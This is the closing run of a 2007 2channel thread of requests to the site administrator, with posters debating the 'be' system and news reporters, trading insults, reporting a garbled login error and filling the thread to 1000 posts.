垢版 |
2007/11/28(水) 12:43:52ID:lC1efmyH0?DIA(120000)
管理人さんメアドの件はどうなったのでしょうか
0907動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 12:43:53ID:iHi2Ex6Y0
チョンリル鳥付けろ
0917動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 13:14:53ID:9846KKAN0
beってなに?ポイント?
0918動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 13:16:11ID:e0BsQC4D0
ひろゆきへ


ニュー速が徐々に草くなってきてるから、「ニュー速のスレをコピペブログへの転載禁止」をLRに入れ、
beを撤廃し記者制に戻せ。糞な記者は直ぐに止めさせるような機能も設けろよ。
0919動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 13:17:54ID:apYEaS2z0
ニュー速が徐々に草くなってきています。「ニュー速のスレをコピペブログへの転載禁止」をLRに入れて、
beを撤廃し記者制に戻してはくれないでしょうか。糞な記者は直ぐに止めさせるような機能も設けてくれたら幸いです。
0920動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 13:19:21ID:uF4OffWw0
http://qb5.2ch.net/test/read.cgi/sec2chd/1190456876/455-456

455 名前:五郎左衛門 ◆GOROswG6Zk [] 投稿日:2007/11/26(月) 02:34:41 ID:LDF3JvVyO
VIP専用のキャップでも作れば?
VIPでしか権限を行使できないけれども採用の機会を多くしてみてさ
★@VIPみたいなものを与えればいい

456 名前:Tamara ★[] 投稿日:2007/11/26(月) 02:35:43 ID:???0
>>455
ニュー速でこりてるから
それは未来永劫なしかと

はいはい記者記者(笑
0928愛『爽やかな風に揺られて』 ◆PoorManD1k
垢版 |
NGNG
まったく2chというところは、泥棒だらけだな・・・・

だいたい、作業★を持ってる古参が、普段の投稿ホストを覗き観てたりするぐらいだからな・・

規制議論板なんか日常茶飯事  WWWWWWWWWWwwwwwwwWWWwwWWw↑→
0929動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 14:19:21ID:C9LVKa5R0?PLT(12022)
>>928
そろそろゆとり板に戻りなされ
0930動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 14:19:26ID:Ct5lX3s20
もういいからアイーンはちょっとだまれ
0931動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 14:20:10ID:3hmeJBX/0
928 名前:あぼ〜ん[NGName:PoorManD1k] 投稿日:あぼ〜ん
0933愛『爽やかな風に揺られて』 ◆PoorManD1k
垢版 |
NGNG
>>929
ああ、オレ様VIP住民じゃないんよ・・・・(笑) 悪しからず〜ですみませ〜ん(笑)
0935動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 14:24:25ID:Ct5lX3s20
>>933
ちょっとは社会に出てみた方がいいよ
0936乞食『貧乏舐めんなや』 ◆MOON///Uh6
垢版 |
NGNG
>>935
そこはどこにあるんですか??オレ様でも歓迎してくれるのですか???
0937動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 14:29:16ID:Ct5lX3s20
MOONはここでいいんじゃない?
0938乞食『貧乏舐めんなや』 ◆MOON///Uh6
垢版 |
2007/11/28(水) 14:47:07ID:hphq8rIO0?2BP(17)
で、纏めはすんだのかな???それとも、まだ探索中??

みんな昼寝しちゃったのか過疎だな・・・オレ様も眠りたい!・・・

WWWWWWWWWWwwWWWWWWWWWwwwwWWWWwwwWWw→↓
0940動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 15:08:42ID:zKxExSA+0
スレストは一人じゃない!

でも、ひ(ryは久しぶりにカッチリ仕事したばかりなのでスレストなんかしないだろうしなw
0942乞食『貧乏舐めんなや』 ◆MOON///Uh6
垢版 |
NGNG
>>941
っそんな簡単にスレストされるん??ポイントくれるのかな??

次スレ立てて来るね〜(笑)

WWWWWWWWWWWWwwwwwwWWWWWWWwwwwwWWw↑→
0949動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 16:08:30ID:14ZoaKwj0
999 名前:Cooks ◆CoooooksjU [] 投稿日:2007/11/28(水) 15:58:22 ID:U0C79lUA0 ?DIA(202535)
真・スレッドストッパー。。。( ̄ー ̄)ニヤリッ

池沼
0950動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 16:10:02ID:MBAikXhVP
474 名前:Cooks ◆CoooooksjU [sage] 投稿日:2007/11/25(日) 09:37:02 ID:+sfQtp9v0
自分のレス引用されると恥ずかしい

0952動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 16:15:40ID:2MAbaPrJ0
>>876
ひろゆきさん パス変えたら
・ム・ケ・・シ・ノ、ォ・癸シ・・「・ノ・・ケ、ャタオ、キ、ッ、ハ、、、隍ヲ、ヌ、ケ。」

の表示が出てログイン出来なくなってしまったのでメールアドレスにパスワード送って貰えるような設定に変えてください。
0958動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 16:45:09ID:4Iq+Ch4v0
わざわざbe付けてまで言うほどのことかよ
0971動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 18:40:30ID:oXYnoIW50?BRZ(11800)
やっと復活できた(´・ω・)
0973動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 18:44:08ID:Xi+gcJDE0
>>972
死刑を支持するクソ野郎ども、おまえら、正義漢ぶってんなよ。おまえらの根底にあるのは、
憎しみ、憎悪、復讐だ。こういうものは、人間の中で最も忌み嫌われる感情だ。
こういう感情を持ったまま大人になったやつは、精神的に幼稚であり、脳が足りない。
極刑を求めて訴え続ける被害者の遺族どもの有様は、無様を通り越えて、哀れみすら感じる。
こいつら、復讐に注ぐそのエネルギーをもっと有効な分野に向けられないのかと。
それから、某ワイドショーに出てきた大学教授、こいつとんでもないキチガイだな。
元最高検察庁検事だかなんだか知らんが、応報刑を正当化しようとしている究極の馬鹿。
江戸時代からタイムスリップしてきた方ですか。とっとと元の時代へ返ってくださいw
応報刑などというものは、理不尽な馬鹿げた方法だ。「人の命を奪ったら自分の命で償え」などという。
そもそも「命で償う」って何なんだ?自分が死ぬだけだろ?死ぬことが償いになるなどという
思想は、無意味であり、理解不能な考え方だ。おまけに「被害者一人と加害者一人で命のバランスが
均衡」などと言っている。命の重さを天秤にかける考え方を持っていることに何の恥じらいもないのかね?
復讐心にとらわれている被害者遺族は、立派なメンヘルだから、精神科の診療を受けることをお勧めする。
0982動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 19:03:18ID:ppZKwtEO0
問題

・ν速はBEが焼かれていても書けるようになってる

・BeType2の他の板はやかれて無くてもBEで書きこみできない
0986動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 19:13:41ID:oXYnoIW50?BRZ(11800)
なんか糞スレばっか立ってるな。
俺も他人のこと言えないけど。
0991動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 20:09:42ID:2pKvznjn0
0992動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 20:12:15ID:fhfLzj4b0
埋めるか
0994動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 20:13:51ID:EwGW0arw0
0997動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 20:16:22ID:JSf9AS+xO
0998動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 20:16:50ID:2pKvznjn0
0999動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 20:17:21ID:EwGW0arw0
1000
10011001
垢版 |
Over 1000Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
レス数が1000を超えています。これ以上書き込みはできません。

ニューススポーツなんでも実況